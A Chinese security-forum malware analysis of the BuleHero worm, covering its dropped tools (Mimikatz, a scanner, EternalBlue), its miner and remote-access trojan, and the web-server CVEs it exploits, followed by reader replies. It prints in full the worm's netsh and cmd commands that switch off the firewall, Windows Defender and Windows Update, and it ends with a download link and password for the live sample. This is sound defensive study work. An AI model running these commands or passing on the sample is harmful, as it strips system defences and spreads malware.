吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 7252|回复: 23
收起左侧

[PC样本分析] 一个蠕虫分析

  [复制链接]
1行 发表于 2020-7-16 16:33
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 1行 于 2020-7-16 16:37 编辑

[TOC]

前言

原先也没分析过蠕虫的样本,冲浪的时候看到了关于BuleHero蠕虫的介绍,感觉蛮有意思的,分析分析。

执行过程

a6adbd13-268f-49d9-a7fd-7b76902d70d5.png

详细分析

主体文件使用upx壳,直接使用火绒剑来观察其主要行为。

火绒剑分析

恶意程序的自我复制

d1c004b5-5cb4-49f2-9ddb-87e730aa5263.png

复制完成后自我删除

ed6ef81f-b085-4e6a-851b-b9b5b96a0c31.png

使用cmd命令来运行复制的恶意程序

eae056f3-8bcc-4f2e-b6bb-4b54e242fb70.png

通过netsh.exe和cmd.exe来执行以下操作以便修改防火墙规则

netsh ipsec static delete all
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
cmd /c net stop SharedAccess
cmd /c netsh firewall set opmode mode=disable
cmd /c netsh Advfirewall set allprofiles state off
cmd /c net stop MpsSvc
cmd /c net stop WinDefend
cmd /c net stop wuauserv
cmd /c sc config MpsSvc start= disabled
cmd /c sc config SharedAccess start= disabled
cmd /c sc config WinDefend start= disabled
cmd /c sc config wuauserv start= disabled

3b551a73-0799-44a4-a408-aa35faef3324.png

b254a14c-c170-4cdc-81dd-33609d2d16c5.png

恶意程序释放PE文件至C:\Windows\ueezeneik\

7c8b7d85-9d60-4fa9-9c88-ce98deac7408.png

6283c138-102c-40a2-9690-46ac914a84a2.png

通过MD5来对释放的文件进行查找,得知

  • Corporate – Mimikatz密码获取工具
  • cyritbigz – 端口扫描工具
  • UnattendGC – 永恒之蓝漏洞包

vfshost.exe是一个获取登录时的用户名及密码的工具。

90d62c3e-54ee-4074-9709-7364f580d7b3.png

端口扫描工具,只是改了改名字而已

b0b3e01a-bc0e-484f-893d-e1421d51d4fb.png

永恒之蓝漏洞包

f53bd446-789e-4b82-af11-563811b7ee79.png

利用ciyfmv.exe来发送挖矿木马矿池登录请求

1e4b8c08-332e-43d3-8b4d-6c4504aa6009.png

挖矿木马的配置文件中显示了矿池地址

c0efe910-2e23-43c6-a4af-a8194b67cd70.png

远控木马的上线包及所在位置

89569f13-4d31-4f4a-9efd-465e26b64a7e.png

基本上看到这里,恶意程序的逻辑大概清楚了。复制自身,删除自身执行复制文件,释放PE文件,执行挖矿及远控木马。

IDA关键词分析

在IDA中也看到了相应的字符串,可以与火绒剑释放PE文件相呼应。

d536b00a-b021-447f-8f24-6a2898aee86d.png

79f2e0dc-7223-4761-a663-5833992a6ba3.png

Wireshark抓包

大量的3389端口扫描行为

887a2a02-4fc1-4e76-851c-46d77d6b0535.png

Wireshark抓包可以看到挖矿木马及远控木马发送的上线包

fd31c762-06b0-4960-b7df-bf1fd08f8888.png

29d58b61-0bb9-4796-a7da-dd3010ac596c.png

远控木马是ceeinject家族的,上线包发送加密后的系统信息,解密之后的上线包是这样的

e2e93b6c-4277-4a8d-a9d9-0fb3767eff9c.png

ceeinject家族加密方式是-0x7a^0x19,以前分析过,没撒特殊的远控木马。

漏洞利用

CVE-2017-12615 漏洞利用

此漏洞会影响Windows上的Apache Tomcat 7.0.0至7.0.79。它可以将恶意的jsp文件上传至服务器。
该漏洞有3种使用方法,此处使用的是 shell.jsp%20

920b8ef4-101c-4ecd-b2f8-ce1b6985ed08.png

解析之后,应该下载其他的攻击荷载。

e0001567-c676-4e39-8731-8ede153eb749.png

CVE-2017-5638 漏洞利用

此漏洞影响的是Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10。Apache Struts是一个免费的开源框架,用于构建Java Web应用程序。攻击者在“Content-Type”标头中构建恶意指令,使得恶意指令直接在服务器中运行。

886c9a05-9bf4-4a09-92ff-bcf31d81b30a.png

CVE-2018-2628 漏洞利用

此漏洞允许未经身份验证的攻击者通过T3协议访问网络,从而破坏在端口7001上运行的Oracle WebLogic Server。

5467fb78-e38f-4706-8772-b2d5a938fd4d.png

CNVD-2018-24942 漏洞利用

此漏洞的原因是,ThinkPHP 5框架的底层未严格过滤控制器名称,这使攻击者可以通过URL在ThinkPHP框架内调用敏感功能,从而导致下载和安装恶意程序。它试图通过从'cmd'运行PowerShell来下载并执行恶意程序。

d782b01a-34a2-44c7-8b06-4322b2b495b6.png

CVE-2019-2725 漏洞利用

此漏洞由于WebLogic的'wls9_async'和'wls-wsat'组件的反序列化输入信息,攻击者可以利用它来执行任意命令。

4bf72183-70f6-4ded-8c1e-9e4be9a2cbff.png

CVE-2018-7600 漏洞利用

Drupal 7.x和8.x的多个子系统中存在一个远程执行代码漏洞。它允许攻击者将恶意负载注入表单结构以执行任意代码。

5dfa0b6e-eb94-47cf-8aa0-6c58ee89bd2e.png

CVE-2019-0193 漏洞利用

此漏洞存在于DataImportHandler模块中,该模块是用于从数据库或其他来源导入数据的通用模块。该模块的整个DIH配置可以来自外部请求中包含的dataConfig参数。由于DIH配置可以包含脚本,因此此参数存在安全风险。攻击者可以利用此漏洞通过包含精心设计的dataConfig参数的恶意请求来导致任意代码执行。

79125845-6441-438f-97f2-c9406caa7bb9.png

PHPStudy后门

BuleHero检查以下PHP模块路径(如果存在),然后将其替换为嵌入式后门,从而使攻击者可以在服务器上执行任何命令。

  • PHPTutorial \ php \ php-5.4.45 \ ext \ php_xmlrpc.dll
  • PHPTutorial \ php \ php-5.2.17 \ ext \ php_xmlrpc.dll

cf9fd3d0-96aa-42c5-b9ec-5a47dd55826b.png

总结

原本只是瞎看看,分析着就感觉很有意思,这个样本的一般行为,从火绒剑里就可以看个七八分。而样本里的漏洞利用基本都是针对web服务器的,看到的时候还在想,怎么就知道样本利用了这些漏洞呢?

而后想起漏洞如果明显的网络行为,可以根据它的网络行为来编写对应的规则,然后利用引擎来解析网络行为,从而匹配对应的漏洞。

样本有点大,MD5是ECB3266326D77741815ECEBB18EE951A,可以自己去 anyrun 上下载。
蓝奏云连接  https://fenxiangcc.lanzouj.com/iNQ6Yenlw5a  解压密码 infected 不要在实体机打开呦

免费评分

参与人数 11威望 +1 吾爱币 +33 热心值 +10 收起 理由
zhangfei123 + 1 谢谢@Thanks!
sailiss + 1 + 1 我很赞同!
x51zqq + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
cnngtc + 3 + 1 我很赞同!
生有涯知无涯 + 2 + 1 我很赞同!
18269055653 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
依币 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Leafmoes + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
xbxbxbxb + 1 + 1 热心回复!
爱国敬业哦 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

大豆走开 发表于 2020-7-16 16:52
一直饱受蠕虫的困扰,受教了
憨憨娃娃 发表于 2020-7-16 16:54
51034581 发表于 2020-7-16 17:22
ningm 发表于 2020-7-16 21:12
看不懂,来捧场
花名丶 发表于 2020-7-17 00:08
看不懂,捧个场
K_n 发表于 2020-7-17 01:29
感谢分享
lypxynok 发表于 2020-7-17 08:09
跟着大佬学习,感谢楼主
caicaiwuguo 发表于 2020-7-17 09:01
十分详尽的一次分析,学习
卢先生 发表于 2020-7-17 10:11
真*大佬。分析的很专业
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 09:23

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表